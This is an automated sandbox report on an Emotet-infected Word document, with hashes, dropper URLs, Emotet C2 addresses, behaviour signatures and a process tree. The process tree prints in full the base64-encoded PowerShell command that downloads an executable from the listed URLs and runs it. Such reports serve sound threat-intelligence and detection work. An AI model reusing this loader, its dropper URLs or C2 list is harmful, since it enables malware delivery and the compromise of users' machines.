Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    15-10-2020 07:43

General

  • Target

    emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc

  • Size

    142KB

  • MD5

    0b5d5c4468a31e83e1ec8a0d8b120496

  • SHA1

    68ac3e73c7bb88172984109977a8dc0f2c095522

  • SHA256

    aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63

  • SHA512

    44b5682ac2f14a0de257bcab0eb42fc725536be8d9ecc432ca3a19ff3425c9b867a85b3d3b37cb1416f76b51d86ae2fcb563641f9fd6b18de0b34024dbc48fd1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://ziaonlinetutor.com/wp-content/a/

exe.dropper

https://bharatlearningsolutions.com/content/MNd/

exe.dropper

https://trungtammtc.com/wp-admin/LP/

exe.dropper

http://bigprint.pictures/cgi-bin/o/

exe.dropper

https://avozdecamacari.com/home/000~ROOT~000/dev/shm/E/

exe.dropper

https://calculafacturaluz.com/sys-cache/9W/

exe.dropper

http://evisualsoft-001-site3.atempurl.com/wp-content/C7/

Extracted

Family

emotet

Botnet

Epoch1

C2

188.157.101.114:80

192.175.111.214:8080

95.85.33.23:8080

192.232.229.54:7080

181.30.61.163:443

186.70.127.199:8090

200.127.14.97:80

70.169.17.134:80

24.232.228.233:80

172.104.169.32:8080

50.28.51.143:8080

177.73.0.98:443

149.202.72.142:7080

37.187.161.206:8080

202.29.239.162:443

213.197.182.158:8080

202.134.4.210:7080

190.24.243.186:80

201.213.177.139:80

105.209.235.113:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3956
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD JABNAGEAMQB0AHIAZQBmAD0AKAAoACcAUgAnACsAJwBrADQAJwApACsAJwA2AHUAJwArACcAeABwACcAKQA7ACQATQB1AG4AbAB3ADIAcwA9ACQAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABlADkAawBpAHcAMQA9ACgAJwBJAHYAJwArACgAJwA3AHgAZQAnACsAJwB5AG4AJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAUwBlAHIAcAByAG8AZgBpAGwARQBcAG8AdwBnAFkAXwBQAE0AXABnAHQARwBtAF8AWQA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAGUAYwBUAE8AUgBZADsAJABTAHIANQB2AGIAXwAzAD0AKAAoACcATQBnACcAKwAnAF8AMQB4ACcAKQArACcAcwAnACsAJwA4ACcAKQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAEMAVQBgAFIAaQB0AGAAeQBwAHIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAsACAAJwArACcAdABsAHMAMQAnACsAJwAxACcAKQArACcALAAnACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEMAcwBoADcAMgB1AHgAPQAoACgAJwBIAGkAZwAnACsAJwA3AGoAJwApACsAJwBzADcAJwApADsAJABZAHoAYwBlAGYAawBfACAAPQAgACgAJwBYACcAKwAnAF8AZQAnACsAKAAnAGMAJwArACcANAA1ACcAKQApADsAJABFAG4AcwA0AGMAdwBhAD0AKAAnAFcAJwArACgAJwB6AGoAdAB4AHEAJwArACcAcwAnACkAKQA7ACQARQA2ADkAawA0ADQAOAA9ACgAJwBaACcAKwAoACcAawBfADQAeQAnACsAJwBuADYAJwApACkAOwAkAEwAeABtAHMAOABvAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATwAnACsAJwB3ACcAKwAnAGcAeQAnACsAJwBfAHAAbQB7ADAAfQBHAHQAJwArACcAZwBtACcAKwAnAF8AeQA1AHsAMAB9ACcAKQAtAGYAWwBDAGgAYQByAF0AOQAyACkAKwAkAFkAegBjAGUAZgBrAF8AKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABHADYAYgBzAGoAMgB2AD0AKAAnAEgAbwAnACsAKAAnAG0AaABfACcAKwAnAF8AJwApACsAJwBqACcAKQA7ACQASwBoAHYAdwAwAG0AZgA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBlAFQALgB3AEUAYgBDAEwASQBFAE4AVAA7ACQARwAyADIAeQBoAHQAagA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAJwArACcAcwA6AC8ALwAnACkAKwAoACcAegAnACsAJwBpAGEAbwBuAGwAaQBuAGUAJwArACcAdAB1ACcAKwAnAHQAJwApACsAKAAnAG8AcgAnACsAJwAuAGMAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGMAJwArACcAbwBuAHQAZQBuACcAKwAnAHQALwAnACkAKwAnAGEAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAOgAnACsAJwAvACcAKwAoACcALwBiACcAKwAnAGgAYQByAGEAdAAnACsAJwBsAGUAYQAnACkAKwAnAHIAJwArACgAJwBuACcAKwAnAGkAbgAnACkAKwAoACcAZwBzAG8AJwArACcAbAB1AHQAaQAnACkAKwAoACcAbwAnACsAJwBuAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwBjACcAKwAnAG8AJwApACsAJwBuAHQAJwArACcAZQBuACcAKwAoACcAdAAvACcAKwAnAE0AJwApACsAKAAnAE4AZAAnACsAJwAvACoAJwArACcAaAB0AHQAJwArACcAcABzADoALwAnACkAKwAoACcALwB0AHIAJwArACcAdQAnACkAKwAoACcAbgAnACsAJwBnAHQAJwApACsAJwBhACcAKwAoACcAbQAnACsAJwBtAHQAYwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8ATABQAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiAGkAZwAnACsAJwBwAHIAaQBuAHQAJwApACsAJwAuAHAAJwArACgAJwBpAGMAJwArACcAdAAnACsAJwB1AHIAZQBzAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4ALwAnACsAJwBvAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBhAHYAbwB6ACcAKwAnAGQAZQBjAGEAbQAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGEAcgBpACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAGgAJwArACgAJwBvAG0AZQAnACsAJwAvADAAJwApACsAJwAwADAAJwArACgAJwB+AFIAJwArACcATwBPACcAKwAnAFQAfgAwADAAMAAnACsAJwAvACcAKQArACgAJwBkAGUAJwArACcAdgAnACkAKwAoACcALwBzACcAKwAnAGgAbQAvACcAKQArACgAJwBFAC8AKgBoAHQAJwArACcAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvACcAKwAnAGMAYQBsACcAKQArACcAYwB1ACcAKwAoACcAbAAnACsAJwBhAGYAJwApACsAJwBhACcAKwAnAGMAdAAnACsAJwB1AHIAJwArACgAJwBhAGwAJwArACcAdQAnACkAKwAoACcAegAuACcAKwAnAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHMAeQAnACkAKwAoACcAcwAnACsAJwAtAGMAJwApACsAJwBhACcAKwAoACcAYwBoAGUALwAnACsAJwA5ACcAKwAnAFcALwAqACcAKQArACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAGUAdgBpACcAKQArACgAJwBzAHUAYQAnACsAJwBsACcAKQArACgAJwBzAG8AJwArACcAZgAnACkAKwAoACcAdAAnACsAJwAtADAAMAAxAC0AcwBpAHQAZQAzACcAKwAnAC4AJwApACsAJwBhACcAKwAnAHQAZQAnACsAKAAnAG0AcAB1AHIAbAAnACsAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0ALwAnACsAJwB3AHAAJwArACgAJwAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlACcAKwAoACcAbgB0AC8AJwArACcAQwAnACsAJwA3AC8AJwApACkALgAiAFMAcABgAEwASQBUACIAKAAkAE0AdQBuAGwAdwAyAHMAKQA7ACQASwA4ADkAaQA3AHUANgA9ACgAKAAnAE0AJwArACcAbAA1ADMAeAAnACkAKwAnAGkAJwArACcAZwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAeAB4AGoAbwA4ADkAIABpAG4AIAAkAEcAMgAyAHkAaAB0AGoAKQB7AHQAcgB5AHsAJABLAGgAdgB3ADAAbQBmAC4AIgBEAE8AdwBuAEwATwBBAGQAZgBgAGkAYABMAEUAIgAoACQASAB4AHgAagBvADgAOQAsACAAJABMAHgAbQBzADgAbwBqACkAOwAkAFYAcQBrADMAcABfADUAPQAoACcARwB5ACcAKwAoACcAYQBwACcAKwAnAHIAJwApACsAJwAxAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAeABtAHMAOABvAGoAKQAuACIAbABgAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADMAOQA4ADIAMAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABMAHgAbQBzADgAbwBqACkAOwAkAEwAbgAzAHEAdwAwADEAPQAoACcAUgBiACcAKwAoACcAOQAnACsAJwA4ADUAJwApACsAJwB4AGIAJwApADsAYgByAGUAYQBrADsAJABXAG0AdQB6AHIAZQBwAD0AKAAnAE0AXwAnACsAJwBpAHQAJwArACgAJwBxACcAKwAnADcAMwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwAxAGgANwBwAGIAaQA9ACgAJwBPADQAJwArACcAMgAnACsAKAAnADAAJwArACcAOAB1AHAAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
      "C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
        "C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:488

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
    MD5

    3b7449cd8c9047abebf15753df263af6

    SHA1

    7e48a9edf1700393af6368b8b8de7ec3f4828f87

    SHA256

    537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

    SHA512

    300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

  • C:\Users\Admin\owgY_PM\gtGm_Y5\X_ec45.exe
    MD5

    3b7449cd8c9047abebf15753df263af6

    SHA1

    7e48a9edf1700393af6368b8b8de7ec3f4828f87

    SHA256

    537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

    SHA512

    300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

  • C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
    MD5

    3b7449cd8c9047abebf15753df263af6

    SHA1

    7e48a9edf1700393af6368b8b8de7ec3f4828f87

    SHA256

    537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

    SHA512

    300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

  • memory/488-14-0x0000000000000000-mapping.dmp
  • memory/488-16-0x0000000002100000-0x000000000211F000-memory.dmp
    Filesize

    124KB

  • memory/488-17-0x0000000002120000-0x000000000213E000-memory.dmp
    Filesize

    120KB

  • memory/1136-9-0x0000000000000000-mapping.dmp
  • memory/1136-12-0x00000000022C0000-0x00000000022DF000-memory.dmp
    Filesize

    124KB

  • memory/1136-13-0x00000000022E0000-0x00000000022FE000-memory.dmp
    Filesize

    120KB

  • memory/2672-8-0x0000029C73600000-0x0000029C73601000-memory.dmp
    Filesize

    4KB

  • memory/2672-7-0x0000029C73450000-0x0000029C73451000-memory.dmp
    Filesize

    4KB

  • memory/2672-6-0x00007FF8FA470000-0x00007FF8FAE5C000-memory.dmp
    Filesize

    9MB

  • memory/3956-0-0x00007FF901A90000-0x00007FF902156000-memory.dmp
    Filesize

    6MB